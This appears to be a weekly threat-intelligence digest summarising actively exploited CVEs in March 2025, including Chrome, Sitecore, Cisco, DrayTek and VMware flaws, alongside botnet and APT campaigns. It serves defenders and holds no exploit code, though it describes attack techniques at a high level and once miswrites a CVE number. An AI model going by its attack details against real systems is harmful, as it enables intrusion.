This week saw critical cybersecurity developments, including four new CISA KEV catalog additions, two in SiteCore CMS and Experience Platform, one in Google Chrome, and one in reviewdog Action-Setup for GitHub Actions. Active exploitation trends remain a major concern, with GreyNoise detecting attacks on Draytek routers, while SANS Internet Storm Center observed ongoing exploitation of unpatched Cisco Smart Licensing Utility Systems.  

Meanwhile, botnet activity surged, as EnemyBot, Sysrv-K, Andoryu, and Androxgh0st targeted Cloud Gateway, GitLab, and PHP vulnerabilities, while Bashlite, BrickerBot, Tsunami, and Mirai ramped up attacks on IoT devices, particularly Eir D1000 modems.

Cyber-espionage campaigns continue to emerge, with Kaspersky Labs uncovering "Operation ForumTroll," leveraging a Google Chrome zero-day for espionage. Meanwhile, Quorum Cyber identified active exploitation of VMware ESXi, Workstation, and Fusion vulnerabilities by APT28, APT29, and APT41. Trend Micro reported Russian threat actor Water Gamayun exploiting a zero-day in Microsoft Management Console (MMC), highlighting the growing use of software vulnerabilities for intelligence gathering.  

Apart from this, Symantec identified Backdoor.Betruger, a multi-functional backdoor deployed by RansomHub affiliates, with attackers also exploiting Windows Privilege Escalation and Veeam credential-leaking vulnerabilities to strengthen their attacks.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

‍CVE-2025-2783

A Sandbox Escape Vulnerability in Mojo within Google Chrome for Windows, affecting versions prior to 134.0.6998.177, has been actively exploited as a zero-day, posing a significant security risk with a high CVSS Score of 8.3. The flaw has been leveraged in targeted attacks against organizations in Russia, prompting Google to release a fix in version 134.0.6998.178, which is now being rolled out globally to users in the Stable Desktop channel. Due to its active exploitation, the vulnerability has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, highlighting its severity. To mitigate the risk, users are strongly urged to update their browsers immediately.

‍CVE-2025-30154

An Embedded Malicious Code Vulnerability has been identified in the reviewdog/action-setup GitHub Action, which exposes sensitive secrets by logging them in GitHub Actions Workflow Logs. This vulnerability, rated with a high CVSS Score of 8.6, affects versions prior to 0.17.2. To mitigate the risk, users are strongly advised to update to version 0.17.2. This flaw has also been added to the CISA KEV catalog.

‍CVE-2025-30355

A Federation Denial-of-Service (DoS) Vulnerability in Synapse, an open-source Matrix homeserver implementation, has been identified with a high CVSS score of 7.1. This flaw, affecting versions up to 1.127.0, enables a malicious server to send specially crafted malformed events, preventing a vulnerable Synapse server from federating with other servers. Actively exploited as zero-day, this vulnerability can lead to significant denial-of-service conditions. The issue has been addressed in Synapse Version 1.127.1, and administrators are strongly urged to update their servers immediately to mitigate the risk.  

‍CVE-2024-20439

Use of Static Administrative Credential Vulnerability in the Cisco Smart Licensing Utility allows an unauthenticated, remote attacker to gain unauthorized access to affected systems. Rated as critical with a CVSS Score of 9.8, this flaw impacts versions 2.0.0, 2.1.0, and 2.2.0. Cisco released software updates in September 2024 to address the issue. Meanwhile, the SANS Internet Storm Center has reported active exploitation attempts in the unpatched systems. Users are strongly advised to apply the patches immediately to mitigate the risk.  

‍CVE-2024-20440

A Sensitive Information Disclosure Vulnerability in the Cisco Smart Licensing Utility poses a critical security risk with a CVSS score of 9.8. This vulnerability affects versions 2.0.0, 2.1.0, and 2.2.0, potentially allowing unauthorized access to sensitive data. Cisco has addressed this issue by releasing security updates in September 2024. However, unpatched versions remain exposed to active exploitation attempts, as reported by the SANS Internet Storm Center. Organizations using affected versions are strongly advised to apply the latest patches immediately to mitigate the risk.

‍CVE-2021-20123

A Path Traversal Vulnerability in the DownloadFileServlet endpoint of Draytek VigorConnect, affecting version 1.6.0-B3, allows an unauthenticated attacker to download arbitrary files from the underlying operating system with root privileges, posing a significant security risk with a CVSS score of 7.5 (High). To address this issue, DrayTek released version 1.6.1 in October 2021. However, GreyNoise has recently detected in-the-wild exploitation, observing activity from 23 unique IPs in the past 30 days. Users are strongly urged to update to the patched version to prevent potential exploitation.

‍CVE-2021-20124

A Path Traversal Vulnerability in the WebServlet endpoint of Draytek VigorConnect, affecting version 1.6.0-B3, allows an unauthenticated attacker to download arbitrary files from the underlying operating system with root privileges, posing a significant security risk with a CVSS score of 7.5 (High). To address this issue, DrayTek released version 1.6.1 in October 2021. However, GreyNoise has recently detected in-the-wild exploitation, observing activity from 22 unique IPs in the past 30 days. Users are strongly urged to update to the patched version to prevent potential exploitation.

‍CVE-2020-8515

A Remote Code Execution Vulnerability in DrayTek Vigor3900, Vigor2960, and Vigor300B routers allows attackers to execute arbitrary code due to an unspecified security flaw. To address this issue, DrayTek released firmware version 1.5.1 in 2021 to patch this vulnerability. However, GreyNoise has recently observed active exploitation in the wild, detecting activity from 82 unique IPs in the past 30 days. Users are strongly urged to update their devices to the latest firmware to prevent potential attacks.

‍CVE-2019-9874

A Deserialization Vulnerability in the Sitecore CMS and Experience Platform (XP) specifically within in the Sitecore.Security.AntiCSRF module. Rated with a CVSS Score of 9.8, this critical flaw allows an unauthenticated attacker to execute arbitrary code by sending a maliciously crafted serialized .NET object in the HTTP POST parameter _CSRFTOKEN.  The vulnerability affects Sitecore CMS versions 7.0–7.2 and XP 7.5–8.2 and has been exploited as part of an attack chain alongside CVE-2019-9875. A proof-of-concept (PoC) was publicly released by Synacktiv researchers in 2019, and this vulnerability has now been added to the CISA KEV catalog.  

‍CVE-2019-9875

A Deserialization Vulnerability in the Sitecore CMS and Experience Platform (XP) specifically within the Sitecore.Security.AntiCSRF module. This flaw enables an authenticated attacker to execute arbitrary code by sending a maliciously crafted serialized .NET object in an HTTP POST parameter. Affecting Sitecore versions up to 9.10, this vulnerability has been rated with a high CVSS Score of 8.8. The vulnerability has been added to the CISA KEV catalog, acknowledging active exploitation in the wild.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.  

CVE-2025-2783

Kaspersky's Global Research and Analysis Team (Great) has uncovered a state-sponsored APT attack, dubbed Operation ForumTroll, which exploits a zero-day vulnerability, CVE-2024-2783, in Google Chrome to conduct cyber-espionage against Russian media professionals and academic institutions. attack begins with phishing emails impersonating invitations to the Primakov Readings forum, containing malicious links that redirect victims to an attacker-controlled website. If a Windows PC user with Google Chrome or any Chromium-based browser clicks the link, malware is deployed automatically, requiring no further action from the victim. The CVE-2025-2783 vulnerability, a logic flaw between Chrome and the Windows operating system, enables sandbox protection bypass, allowing attackers to execute remote code. Kaspersky reported the flaw to Google, which swiftly released a patch. Given the highly targeted nature of the attack, organizations are urged to immediately apply the latest Chrome security update and strengthen their phishing defenses to mitigate the risk.

‍CVE-2025-22224, CVE-2025-22225 and CVE-2025-22226

According to Quorum Cyber, these critical vulnerabilities in VMware products, specifically targeting ESXi, Workstation and Fusion, pose significant security risks, including remote code execution, sandbox escape, and information disclosure. These vulnerabilities have been actively exploited by Advanced Persistent Threat (APT) groups that specialize in attacking virtualization technologies, particularly in sectors such as telecommunications, finance, and critical infrastructure primarily in regions with advanced cloud and virtualization deployments. Among the notable threat actors exploiting these flaws are APT28 (aka Fancy Bear), APT29 (aka Cozy Bear), and APT41.  

• APT28: A Russian cyber-espionage group known for targeting government, military, and security organizations.  
• APT29: Another Russian state-sponsored group focuses on high-profile espionage campaigns against government entities, research institutions, and critical infrastructure firms.
• APT41: A Chinese cyber-espionage and cyber-crime group, operates with a dual mission, conducting state-sponsored intelligence gathering while simultaneously engaging in financially motivated cyberattacks.

‍CVE-2025-26633

Trend Micro Research has uncovered a cyber-espionage campaign orchestrated by the Russian threat actor Water Gamayun (also known as EncryptHub and Larva-208), which exploits a zero-day vulnerability, CVE-2025-26633 in the Microsoft Management Console (MMC) framework to execute malicious code. Dubbed MSC EvilTwin, this attack technique manipulates .mscfiles and the Multilingual User Interface Path (MUIPath) to download and execute malicious payloads, establish persistence and exfiltrate sensitive data from compromised systems. This vulnerability allows attackers to infiltrate target environments using a sophisticated arsenal of malware, including the EncryptHub stealer, DarkWisp backdoor, SilentPrism backdoor, MSC EvilTwin loader, Stealc and Rhadamanthys stealer.

‍CVE-2023-27532 and CVE-2022-24521

According to the Symantec Threat Hunting Team, at least one affiliate of the RansomHub ransomware-as-a-service (RaaS) operation has begun using a new custom backdoor, identified as Backdoor.Betruger, in its attacks. This multi-function backdoor, seemingly designed specifically for ransomware deployment, integrates capabilities that are typically spread across multiple pre-ransomware tools. These include screenshot capture, keylogging, file exfiltration to a command-and-control (C&C) server, network scanning, privilege escalation, and credential dumping. Betruger is just one of several tools used by RansomHub affiliates, who have also adopted the Bring Your Own Vulnerable Driver (BYVOD) technique to bypass security measures, notably using EDRKillshifter to disable endpoint detection and response (EDR) solutions. Additionally, attackers have leveraged multiple vulnerabilities, including CVE-2022-24521, a Windows Privilege Escalation exploit, and CVE-2023-27532, a Veeam exploit that exposes backup credentials.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/03/27/cisa-adds-one-known-exploited-vulnerability-catalog  
2. https://www.cisa.gov/news-events/alerts/2025/03/26/cisa-adds-two-known-exploited-vulnerabilities-catalog  
3. https://www.quorumcyber.com/threat-intelligence/zero-day-vulnerabilities-in-vmware-esxi-workstation-and-fusion-exploited/  
4. https://www.security.com/threat-intelligence/ransomhub-betruger-backdoor#Ransomware
5. https://www.trendmicro.com/en_us/research/25/c/cve-2025-26633-water-gamayun.html  
6. https://www.kaspersky.co.in/blog/forum-troll-apt-with-zero-day-vulnerability/28692/  
7. https://www.greynoise.io/blog/in-the-wild-activity-against-draytek-routers
8. https://isc.sans.edu/diary/Exploit+Attempts+for+Cisco+Smart+Licensing+Utility+CVE202420439+and+CVE202420440/31782/